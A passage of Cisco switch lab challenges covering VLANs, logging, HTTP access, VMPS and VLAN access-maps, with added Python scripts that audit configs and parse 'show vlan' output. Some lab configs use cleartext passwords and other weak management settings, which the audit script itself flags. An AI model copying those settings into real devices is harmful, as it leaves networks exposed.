timestamps             Timestamp debug/log messages
udp-small-servers      Enable small UDP servers (e.g., ECHO)
(config)# service sequence-numbers
(config)# service dhcp
(config)# service finger
(config)# no service tcp-small-servers
(config)# no service udp-small-servers
(config)# service password-encryption

Cisco Switch Challenge 19


Outline
This challenge involves the configuration of a range of ports.
Objectives
The objectives of this challenge are to:

Set up a range of ports.

Example
> en
# vlan database
(vlan)# vlan 1 name indiana
VLAN 1 added:
Name: indiana
(vlan)# vlan 2 name california
VLAN 2 added:

Name: california
(vlan)# vlan 10 name finland
VLAN 10 added:
Name: finland
(vlan)# exit
APPLY completed.
Exiting....
# config t
(config)# int ?
Async              Async interface
BVI                Bridge-Group Virtual Interface
Dialer             Dialer interface
FastEthernet       FastEthernet IEEE 802.3
GigabitEthernet    GigabitEthernet IEEE 802.3z
Group-Async        Async Group interface
Lex                Lex interface
Loopback           Loopback interface
Multilink          Multilink-group interface
Null               Null interface
Port-channel       Ethernet Channel of interfaces
Transparent        Transparent interface
Tunnel             Tunnel interface
Virtual-Template   Virtual Template interface
Virtual-TokenRing  Virtual TokenRing
Vlan               Catalyst Vlans
fcpa               Fiber Channel
range              interface range command
(config)# int range fa0/3 - 4
(config-if-range)# switchport access ?
vlan  Set VLAN when interface is in access mode
(config-if-range)# switchport access vlan ?
<1-1005>  VLAN ID of the VLAN when this port is in access mode
dynamic   When in access mode, this interfaces VLAN is controlled by VMPS
(config-if-range)# switchport access vlan 2
(config-if-range)# exit
(config)# int range fa0/5 - 7
(config-if-range)# switchport access vlan 10
(config-if-range)# exit
(config)# int range fa0/3 - 4
(config-if-range)# shutdown

Cisco Switch Challenge 20


Outline
This challenge involves the setting of logging and HTTP settings.
Objectives
The objectives of this challenge are to:

Define a username and password.
Set up logging.
Define the clock.
Define HTTP settings.
Restrict HTTP access to a single host.

Example
> enable
# config t
(config)# username ?
WORD User name
(config)# username bill ?
access-class         Restrict access by access-class
autocommand          Automatically issue a command after the user logs in
callback-dialstring  Callback dialstring
callback-line        Associate a specific line with this callback
callback-rotary      Associate a rotary group with this callback
dnis                 Do not require password when obtained via DNIS
nocallback-verify    Do not require authentication after callback
noescape             Prevent the user from using an escape character
nohangup             Do not disconnect after an automatic command
nopassword           No password is required for the user to log in
password             Specify the password for the user
privilege            Set user privilege level
secret               Specify the secret for the user
user-maxlinks        Limit the user's number of inbound links
<cr>
(config)# username bill password ?
0     Specifies an UNENCRYPTED password will follow
7     Specifies a HIDDEN password will follow
LINE  The UNENCRYPTED (cleartext) user password
(config)# username bill password smith
(config)# logging ?
Hostname or A.B.C.D  IP address of the logging host
buffered             Set buffered logging parameters
cns-events           Set CNS Event logging level
console              Set console logging level
exception            Limit size of exception flush output
facility             Facility parameter for syslog messages
file                 Set logging file parameters
history              Configure syslog history table
monitor              Set terminal line (monitor) logging level
on                   Enable logging to all supported destinations
rate-limit           Set messages per second limit
source-interface     Specify interface for source address in logging transactions
trap                 Set syslog server logging level
(config)# logging on
(config)# logging 212.72.52.7
(config)# logging buffer ?
<0-7>              Logging severity level
<4096-2147483647>  Logging buffer size
alerts             Immediate action needed           (severity=1)
critical           Critical conditions               (severity=2)
debugging          Debugging messages                (severity=7)
emergencies        System is unusable                (severity=0)
errors             Error conditions                  (severity=3)
informational      Informational messages            (severity=6)
notifications      Normal but significant conditions (severity=5)
warnings           Warning conditions                (severity=4)
<cr>
(config)# logging buffer 440240
(config)# logging trap ?
<0-7>          Logging severity level
alerts         Immediate action needed           (severity=1)
critical       Critical conditions               (severity=2)
debugging      Debugging messages                (severity=7)
emergencies    System is unusable                (severity=0)
errors         Error conditions                  (severity=3)
informational  Informational messages            (severity=6)
notifications  Normal but significant conditions (severity=5)
warnings       Warning conditions                (severity=4)
<cr>
(config)# logging trap emergency
(config)# logging monitor emergency
(config)# logging console emergency
(config)# logging buffer emergency
(config)# access-list 2 permit host 192.168.1.1
(config)# access-list 2 deny any
(config)# ip http ?
access-class    Restrict access by access-class
authentication  Set http authentication method
path            Set base path for HTML
port            HTTP port
server          Enable HTTP server
(config)# ip http server
(config)# ip http port 1024
(config)# ip http authentication ?
enable  Use enable passwords
local   Use local username and passwords
tacacs  Use tacacs to authorize user
(config)# ip http authentication local
(config)# exit
# sh running
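Taken together, the challenges above leave several management-plane settings a reviewer would question: an SNMP community with no access-list, `username ... nopassword` and `password` rather than `secret`, `service finger` left on, a CDP holdtime shorter than the CDP timer, `logging trap` at emergency level, an access-list 2 here that is written but never applied, and the `ip http access-class 10` of Challenge 15 naming a list that neither challenge defines. The following Python script is an added example, not part of the NetworkSims material: it runs those checks over a constructed running-config built from commands typed in the challenges, plus a hardened counterpart (`HARDENED_CONFIG`, with `EXAMPLE-*` placeholder values) that passes every check; the check names and wording are the example's own.

```python
"""Audit an IOS running-config for management-plane weaknesses left by the challenges above.
Added example, not part of the NetworkSims material: the checks and their wording are the
example's own; PAGE_CONFIG gathers commands typed in the challenges, HARDENED_CONFIG is a variant.
"""

# Severity keywords as listed by "logging trap ?".
SEVERITY = {"emergencies": 0, "alerts": 1, "critical": 2, "errors": 3,
            "warnings": 4, "notifications": 5, "informational": 6, "debugging": 7}


def snmp_community_findings(tokens, acls):
    """Check one 'snmp-server community <string> [RO|RW] [acl]' line ('view' is not handled)."""
    community, mode, acl = tokens[2], "RO", None
    for token in tokens[3:]:
        if token.upper() in ("RO", "RW"):
            mode = token.upper()
        else:
            acl = token                 # anything else after the string is the access-list
    out = []
    if acl is None:
        out.append(("snmp", f"community '{community}' ({mode}) has no access-list; any host may poll it"))
    elif acl not in acls:
        out.append(("snmp", f"community '{community}' names access-list {acl}, which is not defined"))
    if mode == "RW":
        out.append(("snmp", f"community '{community}' is read-write"))
    return out, acl


def audit(config_text):
    """Return a list of (check, detail) findings for one running-config."""
    lines = [line.strip() for line in config_text.splitlines() if line.strip()]
    acls = {line.split()[1] for line in lines if line.startswith("access-list ")}  # numbered lists only
    used_acls, findings = set(), []
    timer, holdtime = 60, 180           # IOS defaults when no cdp timer/holdtime is configured
    for line in lines:
        tokens = line.split()
        if line.startswith("snmp-server community ") and len(tokens) >= 3:
            found, acl = snmp_community_findings(tokens, acls)
            findings.extend(found)
            used_acls.add(acl)
        elif tokens[0] == "username" and "nopassword" in tokens:
            findings.append(("users", f"user '{tokens[1]}' may log in without a password"))
        elif tokens[0] == "username" and "password" in tokens:
            findings.append(("users", f"user '{tokens[1]}' uses 'password' (reversible type 0/7); use 'secret'"))
        elif line.startswith("enable password "):
            findings.append(("users", "enable password is reversible; rely on enable secret alone"))
        elif line == "service finger":
            findings.append(("services", "finger reveals logged-in users; disable it with 'no service finger'"))
        elif line.startswith("logging trap ") and len(tokens) == 3:
            word = tokens[2]
            level = int(word) if word.isdigit() else next(
                (v for k, v in SEVERITY.items() if k.startswith(word)), None)
            if level is not None and level < SEVERITY["informational"]:
                findings.append(("logging", f"logging trap {word} (severity {level}) drops config changes "
                                            "(5) and login failures (4) before they reach the syslog host"))
        elif line.startswith("cdp timer ") and len(tokens) == 3:
            timer = int(tokens[2])
        elif line.startswith("cdp holdtime ") and len(tokens) == 3:
            holdtime = int(tokens[2])
        elif line.startswith("ip http access-class ") and len(tokens) == 4:
            used_acls.add(tokens[3])
            if tokens[3] not in acls:
                findings.append(("http", f"ip http access-class {tokens[3]} names an undefined access-list"))
    if "ip http server" in lines and not any(x.startswith("ip http access-class ") for x in lines):
        findings.append(("http", "ip http server is enabled with no ip http access-class; every source may reach it"))
    if "service password-encryption" not in lines:
        findings.append(("services", "service password-encryption is absent; line and user passwords are stored in clear"))
    if holdtime <= timer:
        findings.append(("cdp", f"cdp holdtime {holdtime} does not exceed cdp timer {timer}; neighbours expire between advertisements"))
    findings.extend(("acl", f"access-list {a} is defined but never applied") for a in sorted(acls - used_acls))
    return findings


# Constructed running-config of commands typed above; "emergencies" is the keyword "logging trap ?" lists.
PAGE_CONFIG = """
snmp-server community popup
cdp timer 89
cdp holdtime 41
enable password default
username katie password hotel
username anne nopassword
service finger
service password-encryption
logging trap emergencies
access-list 2 permit host 192.168.1.1
access-list 2 deny any
ip http server
ip http access-class 10
"""

# A constructed counterpart that clears every check; EXAMPLE-* values are placeholders.
HARDENED_CONFIG = """
access-list 10 permit host 192.168.1.1
access-list 10 deny any
snmp-server community EXAMPLE-COMMUNITY RO 10
username katie secret EXAMPLE-SECRET
service password-encryption
no service finger
logging trap informational
ip http server
ip http access-class 10
"""
```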

Cisco Switch Test 1 (Challenge 21)


Unit 1: Switch Basics
The most up-to-date version of this test is at:
http://networksims.com/sw01.html

Cisco Switch Challenge 22


Area: Switches VLANs
Outline

This challenge involves defining VLANs.


Objectives
The objectives of this challenge are to:

Define and create VLANs.
Assign ports to VLANs.

The commands used are:

> enable
# config t
(config)# int vlan1
(config-if)# ip address 1.2.3.4 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# int vlan2
(config-if)# ip address 1.2.3.5 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# int vlan3
(config-if)# ip address 1.2.3.6 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# int vlan10
(config-if)# ip address 1.2.3.7 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# int vlan11
(config-if)# ip address 1.2.3.8 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# int vlan12
(config-if)# ip address 1.2.3.9 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# int fa0/1
(config-if)# switchport access vlan 1
(config-if)# exit
(config)# int fa0/2
(config-if)# switchport access vlan 2
(config-if)# exit

Alt:
# vlan database
% Warning: It is recommended to configure VLAN from config mode,
as VLAN database mode is being deprecated. Please consult user
documentation for configuring VTP/VLAN in config mode.
(vlan)# vlan 1 name fred

Example
> enable
# config t
(config)# int vlan1
(config-if)# ip address 1.2.3.4 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# int vlan2
(config-if)# ip address 1.2.3.5 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# int vlan3
(config-if)# ip address 1.2.3.6 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# int vlan10
(config-if)# ip address 1.2.3.7 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# int vlan11
(config-if)# ip address 1.2.3.8 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# int vlan12
(config-if)# ip address 1.2.3.9 255.255.255.0
(config-if)# no shutdown
(config-if)# exit

(config)# int fa0/1
(config-if)# switchport ?
  access         Set access mode characteristics of the interface
  block          Disable forwarding of unknown uni/multi cast addresses
  broadcast      Set broadcast suppression level on this interface
  encapsulation  Set trunking encapsulation when interface is in trunking mode
  host           Set port host
  mode           Set trunking mode of the interface
  multicast      Set multicast suppression level on this interface
  native         Set trunking native characteristics when interface is in trunking mode
  nonegotiate    Device will not engage in negotiation protocol on this interface
  port-security  Security related command
  priority       Set appliance 802.1p priority
  protected      Configure an interface to be a protected port
  pruning        Set pruning VLAN characteristics when interface is in trunking mode
  trunk          Set trunking characteristics of the interface
  unicast        Set unicast suppression level on this interface
  voice          Voice appliance attributes
  <cr>
(config-if)# switchport access ?
  vlan  Set VLAN when interface is in access mode
(config-if)# switchport access vlan ?
  <1-4094>  VLAN ID of the VLAN when this port is in access mode
  dynamic   When in access mode, this interfaces VLAN is controlled by VMPS
(config-if)# switchport access vlan 1
(config-if)# exit
(config)# int fa0/2
(config-if)# switchport access vlan 2
(config-if)# exit
(config)# exit
# show vlan

VLAN Name                             Status    Ports
---- -------------------------------- --------- -------------------------------
1    default                          active    Fa0/2, Fa0/3, Fa0/4, Fa0/5
                                                Fa0/6, Fa0/7, Fa0/8, Fa0/9
                                                Fa0/10, Fa0/11, Fa0/12, Fa0/13
                                                Fa0/14, Fa0/15, Fa0/16, Fa0/17
                                                Fa0/18, Fa0/19, Fa0/20, Fa0/21
                                                Fa0/22, Fa0/23, Fa0/24
2    VLAN0002                         active    Fa0/1
1002 fddi-default                     act/unsup
1003 token-ring-default               act/unsup
1004 fddinet-default                  act/unsup
1005 trnet-default                    act/unsup

VLAN Type  SAID       MTU   Parent RingNo BridgeNo Stp  BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1    enet  100001     1500  -      -      -        -    -        0      0
2    enet  100002     1500  -      -      -        -    -        0      0
1002 fddi  101002     1500  -      -      -        -    -        0      0
1003 tr    101003     1500  -      -      -        -    -        0      0
1004 fdnet 101004     1500  -      -      -        ieee -        0      0
1005 trnet 101005     1500  -      -      -        ibm  -        0      0

Remote SPAN VLANs
------------------------------------------------------------------------------

Primary Secondary Type              Ports
------- --------- ----------------- ------------------------------------------

Alt:
# vlan database
% Warning: It is recommended to configure VLAN from config mode,
as VLAN database mode is being deprecated. Please consult user
documentation for configuring VTP/VLAN in config mode.
(vlan)# vlan 1 name fred
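
As an added example (not part of the NetworkSims material), here is a small Python parser for the `show vlan` table above, together with the check a network defender usually wants from it: which ports are still sitting in the default VLAN 1, the VLAN that also carries the management SVI configured in this challenge. The sample output is constructed to mirror the table shown in this challenge; the function names are my own.

```python
import re

# Constructed sample, modelled on the "show vlan" output in this challenge
# (VLAN names and port lists as on the page; not captured from a real switch).
SHOW_VLAN = """\
VLAN Name                             Status    Ports
---- -------------------------------- --------- -------------------------------
1    default                          active    Fa0/2, Fa0/3, Fa0/4, Fa0/5
                                                Fa0/6, Fa0/7, Fa0/8, Fa0/9
                                                Fa0/10, Fa0/11, Fa0/12, Fa0/13
                                                Fa0/14, Fa0/15, Fa0/16, Fa0/17
                                                Fa0/18, Fa0/19, Fa0/20, Fa0/21
                                                Fa0/22, Fa0/23, Fa0/24
2    VLAN0002                         active    Fa0/1
1002 fddi-default                     act/unsup
1003 token-ring-default               act/unsup
1004 fddinet-default                  act/unsup
1005 trnet-default                    act/unsup

VLAN Type  SAID       MTU   Parent RingNo BridgeNo Stp  BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1    enet  100001     1500  -      -      -        -    -        0      0
"""

# One VLAN row: id, name, status, then an optional first chunk of ports.
ROW_RE = re.compile(r"^(\d+)\s+(\S+)\s+(active|act/unsup|act/lshut|suspended)\s*(.*)$")


def parse_show_vlan(text):
    """Return {vlan_id: {"name", "status", "ports"}} from the first table of
    'show vlan'. Indented lines continue the port list of the previous VLAN;
    parsing stops at the blank line before the Type/SAID/MTU table."""
    vlans = {}
    current = None
    in_table = False
    for line in text.splitlines():
        if not in_table:
            in_table = line.startswith("----")   # skip until the header rule
            continue
        if not line.strip():
            break
        m = ROW_RE.match(line)
        if m:
            current = {"name": m.group(2), "status": m.group(3), "ports": []}
            vlans[int(m.group(1))] = current
            tail = m.group(4)
        elif line.startswith(" ") and current is not None:
            tail = line.strip()                   # continuation of the port list
        else:
            continue
        current["ports"].extend(p.strip() for p in tail.split(",") if p.strip())
    return vlans


def access_ports_by_vlan(vlans):
    """Only VLANs that actually have ports assigned (drops the unused defaults)."""
    return {vid: v["ports"] for vid, v in vlans.items() if v["ports"]}


def ports_in_default_vlan(vlans):
    """Ports still in VLAN 1. Unused ports left in the default VLAN share a
    broadcast domain with the management SVI (interface vlan1 above), so this
    is the list to shut down or move to an unused parking VLAN."""
    return list(vlans.get(1, {"ports": []})["ports"])


if __name__ == "__main__":
    parsed = parse_show_vlan(SHOW_VLAN)
    for vid, ports in access_ports_by_vlan(parsed).items():
        print(f"VLAN {vid} ({parsed[vid]['name']}): {len(ports)} port(s)")
    print("still in VLAN 1:", ", ".join(ports_in_default_vlan(parsed)))
```

Run against the table above, the audit lists the 23 ports Fa0/2 to Fa0/24 as still in VLAN 1; only Fa0/1 has been moved.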

Cisco Switch Challenge 23

Area: Switches VLANs
Outline
This challenge involves defining VLANs.
Objectives
The objectives of this challenge are to:

Define and create VLANs.
Assign ports to VLANs.
Define the name of a VLAN.

The commands used are:


> enable
# config t
(config)# int vlan1
(config-if)# ip address 1.2.3.4 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# vlan 1
(config-vlan)# mtu 1000
(config-vlan)# name fred
(config-vlan)# exit
(config)# exit

Alt (to create VLAN and define details):


# vlan database
(vlan)# vlan 1 mtu 1000
(vlan)# vlan 1 name fred

Example
> enable
# config t
(config)# int vlan1
(config-if)# ip address 1.2.3.4 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# vlan 1
(config-vlan)# ?
VLAN configuration commands:
  are           Maximum number of All Route Explorer hops for this VLAN (or zero if none specified)
  backupcrf     Backup CRF mode of the VLAN
  bridge        Bridging characteristics of the VLAN
  exit          Apply changes, bump revision number, and exit mode
  media         Media type of the VLAN
  mtu           VLAN Maximum Transmission Unit
  name          Ascii name of the VLAN
  no            Negate a command or set its defaults
  parent        ID number of the Parent VLAN of FDDI or Token Ring type VLANs
  private-vlan  Configure a private VLAN
  remote-span   Configure as Remote SPAN VLAN
  ring          Ring number of FDDI or Token Ring type VLANs
  said          IEEE 802.10 SAID
  shutdown      Shutdown VLAN switching
  state         Operational state of the VLAN
  ste           Maximum number of Spanning Tree Explorer hops for this VLAN (or zero if none specified)
  stp           Spanning tree characteristics of the VLAN
  tb-vlan1      ID number of the first translational VLAN for this VLAN (or zero if none)
  tb-vlan2      ID number of the second translational VLAN for this VLAN (or zero if none)
(config-vlan)# mtu ?
  <576-18190>  Value of VLAN Maximum Tranmission Unit
(config-vlan)# mtu 1000
(config-vlan)# name ?
  WORD  The ascii name for the VLAN
(config-vlan)# name fred
(config-vlan)# exit
(config)# exit

The alternative method, which is deprecated, is:

# vlan database
% Warning: It is recommended to configure VLAN from config mode,
as VLAN database mode is being deprecated. Please consult user
documentation for configuring VTP/VLAN in config mode.
(vlan)# vlan ?
  <1-1005>  ISL VLAN index
(vlan)# vlan 1 ?
  are        Maximum number of All Route Explorer hops for this VLAN
  backupcrf  Backup CRF mode of the VLAN
  bridge     Bridging characteristics of the VLAN
  media      Media type of the VLAN
  mtu        VLAN Maximum Transmission Unit
  name       Ascii name of the VLAN
  parent     ID number of the Parent VLAN of FDDI or Token Ring type VLANs
  ring       Ring number of FDDI or Token Ring type VLANs
  said       IEEE 802.10 SAID
  state      Operational state of the VLAN
  ste        Maximum number of Spanning Tree Explorer hops for this VLAN
  stp        Spanning tree characteristics of the VLAN
  tb-vlan1   ID number of the first translational VLAN for this VLAN (or zero if none)
  tb-vlan2   ID number of the second translational VLAN for this VLAN (or zero if none)
(vlan)# vlan 1 mtu ?
  <576-18190>  Value of VLAN Maximum Tranmission Unit
(vlan)# vlan 1 mt 1000
(vlan)# vlan 1 name ?
  WORD  The ascii name for the VLAN
(vlan)# vl 1 name fred

Cisco Switch Challenge 24

Area: Switches Extended VLANs
Outline
This challenge involves defining extended VLANs (from 1006 to 4096). Extended VLANs
are not saved to the VLAN database; instead they are saved to the configuration file, and
can thus be seen in the startup and running configuration (this makes them easier to copy
onto other devices).
Objectives
The objectives of this challenge are to:

Create an extended VLAN (from 1006 to 4096).
Define extended VLAN details.

The commands used are:

> enable
# config t
(config)# vtp mode transparent
(config)# vlan 1006
(config-vlan)# name test
(config-vlan)# mtu 1500
(config-vlan)# end

Example
> enable
# config t
(config)# vtp ?
  domain     Set the name of the VTP administrative domain.
  file       Configure IFS filesystem file where VTP configuration is stored.
  interface  Configure interface as the preferred source for the VTP IP updater address.
  mode       Configure VTP device mode
  password   Set the password for the VTP administrative domain
  pruning    Set the adminstrative domain to permit pruning
  version    Set the adminstrative domain to VTP version
(config)# vtp mode ?
  client       Set the device to client mode.
  server       Set the device to server mode.
  transparent  Set the device to transparent mode.
(config)# vtp mode transparent
(config)# vlan 1006
(config-vlan)# name test
(config-vlan)# mtu 1500
(config-vlan)# end
# sh running
!
version 12.1
no service pad
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Switch
!
!
ip subnet-zero
!
vtp mode transparent
!
!
vlan 1006
name test
mtu 1500
!
!

Note: If the transparent mode was not set, the following would appear:
(config)# vlan 1006
(config-vlan)# exit
% Failed to create VLANs 1006
VLAN(s) not available in Port Manager.
Failed to commit extended VLAN(s) changes.

And the VLAN would not be created.


Note: Standard VLANs are stored in the VLAN database and do not appear in the running
config.

Cisco Switch Challenge 25


Outline
This challenge involves the configuration of VMPS.

Objectives
The objectives of this challenge are to:

Setup VMPS.

Example
# config t
(config)# vmps ?
  reconfirm  Set VMPS reconfirm interval
  retry      Set VMPS retry count
  server     Configure server IP address
(config)# vmps server ?
  Hostname or A.B.C.D  IP address
(config)# vmps server 199.156.165.8 ?
  primary  Specify primary server
  <cr>
(config)# vmps server 199.156.165.8 primary
(config)# vmps server 208.89.97.3
(config)# vmps server 206.81.143.1
(config)# vm reconfirm ?
  <0-120>  Number of minutes between reconfirmations
(config)# vm retry ?
  <1-10>  Retry count per server
(config)# vmps reconfirm 50
(config)# vmps retry 5
(config)# int fa0/1
(config-if)# switchport mode access
(config-if)# switchport access ?
  vlan  Set VLAN when interface is in access mode
(config-if)# switchport access vlan ?
  <1-1005>  VLAN ID of the VLAN when this port is in access mode
  dynamic   When in access mode, this interfaces VLAN is controlled by VMPS
(config-if)# switchport access vlan dynamic
(config)# int fa0/3
(config-if)# switchport mode access
(config-if)# switchport access vlan dynamic
(config)# int fa0/4
(config-if)# switchport mode access
(config-if)# switchport access vlan dynamic
(config-if)# exit
(config)# exit
# show vmps

Cisco Switch Challenge 26


Area: Switches VMPS
Outline
It is possible to configure VLANs using a VMPS server. The switch can be a VMPS client,
which points to a VMPS server.
Objectives
The objectives of this challenge are to:

Define VMPS servers.
Define VMPS details.
Define dynamic membership for a port to a VLAN, through the VMPS server.

The commands used are:

> enable
# config t
(config)# vmps server 1.2.3.4 primary
(config)# vmps server 1.2.3.5
(config)# vmps rec 10
(config)# vmps ret 8
(config)# int fa0/1
(config-if)# switchport mode access
(config-if)# switchport access vlan dynamic

Example
> enable
# config t
(config)# vmps ?
  reconfirm  Set VMPS reconfirm interval
  retry      Set VMPS retry count
  server     Configure server IP address
(config)# vmps server ?
  Hostname or A.B.C.D  IP address
(config)# vmps server 1.2.3.4 ?
  primary  Specify primary server
  <cr>
(config)# vmps server 1.2.3.4 primary
(config)# vmps server 1.2.3.5
(config)# vmps reconfirm ?
  <0-120>  Number of minutes between reconfirmations
(config)# vmps reconfirm 10
(config)# vm retry ?
  <1-10>  Retry count per server
(config)# vm retry 8
(config)# int fa0/1
(config-if)# switchport mode access
(config-if)# switchport ?
  access         Set access mode characteristics of the interface
  block          Disable forwarding of unknown uni/multi cast addresses
  broadcast      Set broadcast suppression level on this interface
  encapsulation  Set trunking encapsulation when interface is in trunking mode
  host           Set port host
  mode           Set trunking mode of the interface
  multicast      Set multicast suppression level on this interface
  native         Set trunking native characteristics when interface is in trunking mode
  nonegotiate    Device will not engage in negotiation protocol on this interface
  port-security  Security related command
  priority       Set appliance 802.1p priority
  protected      Configure an interface to be a protected port
  pruning        Set pruning VLAN characteristics when interface is in trunking mode
  trunk          Set trunking characteristics of the interface
  unicast        Set unicast suppression level on this interface
  voice          Voice appliance attributes
  <cr>
(config-if)# switchport a ?
  vlan  Set VLAN when interface is in access mode
(config-if)# switchport a v ?
  <1-4094>  VLAN ID of the VLAN when this port is in access mode
  dynamic   When in access mode, this interfaces VLAN is controlled by VMPS
(config-if)# switchport access vlan dynamic
  <cr>
# sh vmps
VQP Client Status:
--------------------
VMPS VQP Version:   1
Reconfirm Interval: 10 min
Server Retry Count: 8
VMPS domain server: 1.2.3.4
                    1.2.3.5 (primary, current)

Reconfirmation status
---------------------
VMPS Action:         No Dynamic Port

In this example, port Fa0/1 obtains its VLAN membership from the VMPS server.

Cisco Switch Challenge 27


Outline
This challenge involves the configuration of an access-map.
Objectives
The objectives of this challenge are to:

Define an access list to permit a range of addresses.
Define an access-map.
Apply the access-map.
# config t
(config)# vlan 1
(config-vlan)# name utah
(config-vlan)# exit
(config)# access-list 10 permit 20.123.92.0 0.0.0.1
(config)# vlan access-map utah
(config-access-map)# action forward
(config-access-map)# match ip access 10
(config-access-map)# exit
(config)# vlan filter utah vlan-list 1

Example
# config t
(config)# vlan 1
(config-vlan)# name utah
(config-vlan)# exit
(config)# access-list 10 permit ?
  Hostname or A.B.C.D  Address to match
  any                  Any source host
  host                 A single host address
(config)# access-list 10 permit 20.123.92.0 0.0.0.1
(config)# vlan access-map ?
  WORD  Vlan access map tag
(config)# vlan access-map utah
(config-access-map)# ?
  action   Take the action
  default  Set a command to its defaults
  exit     Exit from vlan access-map configuration mode
  match    Match values.
  no       Negate a command or set its defaults
(config-access-map)# action ?
  drop     Drop packets
  forward  Forward packets
(config-access-map)# action forward
(config-access-map)# match ?
  ip   IP based match
  mac  MAC based match
(config-access-map)# match ip ?
  address  Match IP address to access control.
(config-access-map)# match ip access ?
  <1-199>      IP access list (standard or extended)
  <1300-2699>  IP expanded access list (standard or extended)
  WORD         Access-list name
  <cr>
(config-access-map)# match ip access 10
(config-access-map)# exit
(config)# vlan ?
  WORD        ISL VLAN IDs 1-4094
  access-map  Create vlan access-map or enter vlan access-map command mode
  dot1q       dot1q parameters
  filter      Apply a VLAN Map
  internal    internal VLAN
(config)# vlan filter ?
  WORD  VLAN map name
(config)# vl filter utah ?
  vlan-list  VLANs to apply filter to
(config)# vl filter utah vlan-list ?
  <1-4094>  VLAN id
  all       Remove this filter from all VLANs
(config)# vlan filter utah vlan-list 1

Cisco Switch Challenge 28
Outline
This challenge involves the configuration of VLAN filtering to drop TCP packets.
Objectives
The objectives of this challenge are to:

Define an extended named ACL.
Define the packets to be dropped by the VLAN.

Example
Switch(config)# ip access-list extended test
Switch(config-ext-nacl)# ?
Ext Access List configuration commands:
  default   Set a command to its defaults
  deny      Specify packets to reject
  dynamic   Specify a DYNAMIC list of PERMITs or DENYs
  evaluate  Evaluate an access list
  exit      Exit from access-list configuration mode
  no        Negate a command or set its defaults
  permit    Specify packets to forward
  remark    Access list entry comment
Switch(config-ext-nacl)# permit any any
Switch(config-ext-nacl)# exit
Switch(config)# vlan access-map London 10
Switch(config-access-map)# ?
Vlan access-map configuration commands:
  action   Take the action
  default  Set a command to its defaults
  exit     Exit from vlan access-map configuration mode
  match    Match values.
  no       Negate a command or set its defaults
Switch(config-access-map)# match ?
  ip   IP based match
  mac  MAC based match
Switch(config-access-map)# match ip ?
  address  Match IP address to access control.
Switch(config-access-map)# match ip address ?
  <1-199>      IP access list (standard or extended)
  <1300-2699>  IP expanded access list (standard or extended)
  WORD         Access-list name
  <cr>
Switch(config-access-map)# match ip address test
Switch(config-access-map)# action ?
  drop     Drop packets
  forward  Forward packets
Switch(config-access-map)# action drop
Switch(config-access-map)# exit
Switch(config)# vl ?
  WORD        ISL VLAN IDs 1-4094
  access-map  Create vlan access-map or enter vlan access-map command mode
  dot1q       dot1q parameters
  filter      Apply a VLAN Map
  internal    internal VLAN
Switch(config)# vlan filter ?
  WORD  VLAN map name
Switch(config)# vl f test ?
  vlan-list  VLANs to apply filter to
Switch(config)# vlan filter test vlan-list 10

Cisco Switch Challenge 29


Outline
This challenge involves the configuration of VLAN filtering to forward TCP packets.
Objectives
The objectives of this challenge are to:

Define an extended named ACL.
Define the packets to be forwarded by the VLAN.

Example
Switch(config)# ip access-list extended test
Switch(config-ext-nacl)# ?
Ext Access List configuration commands:
  default   Set a command to its defaults
  deny      Specify packets to reject
  dynamic   Specify a DYNAMIC list of PERMITs or DENYs
  evaluate  Evaluate an access list
  exit      Exit from access-list configuration mode
  no        Negate a command or set its defaults
  permit    Specify packets to forward
  remark    Access list entry comment
Switch(config-ext-nacl)# permit any any
Switch(config-ext-nacl)# exit
Switch(config)# vlan access-map London 10
Switch(config-access-map)# ?
Vlan access-map configuration commands:
  action   Take the action
  default  Set a command to its defaults
  exit     Exit from vlan access-map configuration mode
  match    Match values.
  no       Negate a command or set its defaults
Switch(config-access-map)# match ?
  ip   IP based match
  mac  MAC based match
Switch(config-access-map)# match ip ?
  address  Match IP address to access control.
Switch(config-access-map)# match ip address ?
  <1-199>      IP access list (standard or extended)
  <1300-2699>  IP expanded access list (standard or extended)
  WORD         Access-list name
  <cr>
Switch(config-access-map)# match ip address test
Switch(config-access-map)# action ?
  drop     Drop packets
  forward  Forward packets
Switch(config-access-map)# action forward
Switch(config-access-map)# exit
Switch(config)# vl ?
  WORD        ISL VLAN IDs 1-4094
  access-map  Create vlan access-map or enter vlan access-map command mode
  dot1q       dot1q parameters
  filter      Apply a VLAN Map
  internal    internal VLAN
Switch(config)# vlan filter ?
  WORD  VLAN map name
Switch(config)# vl f test ?
  vlan-list  VLANs to apply filter to
Switch(config)# vlan filter test vlan-list 10
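
As an added example that is not part of the NetworkSims material, the following Python models how the VLAN maps in Challenges 27 to 29 are evaluated: Cisco wildcard-mask matching for each ACL entry, then the access-map clauses in sequence-number order, taking the action of the first clause whose ACL permits the packet and dropping a packet that matches no clause. The ACL lines are the ones used on this page (the named ACL `test` is parsed here as `permit ip any any`); the helper names (`parse_ace`, `vacl_action`, `packet`) and the sample packets are my own constructions.

```python
import ipaddress

PROTOCOLS = {"ip", "tcp", "udp", "icmp"}


def wildcard_match(addr, base, wildcard):
    """Cisco wildcard-mask test: a 1 bit in the wildcard means 'do not care'."""
    a = int(ipaddress.IPv4Address(addr))
    b = int(ipaddress.IPv4Address(base))
    care = ~int(ipaddress.IPv4Address(wildcard)) & 0xFFFFFFFF
    return (a & care) == (b & care)


def _addr_spec(tokens, i):
    """Consume one ACL address spec starting at tokens[i]: 'any', 'host A',
    'A W' or a bare 'A'. Returns ((base, wildcard), next_index)."""
    if tokens[i] == "any":
        return ("0.0.0.0", "255.255.255.255"), i + 1
    if tokens[i] == "host":
        return (tokens[i + 1], "0.0.0.0"), i + 2
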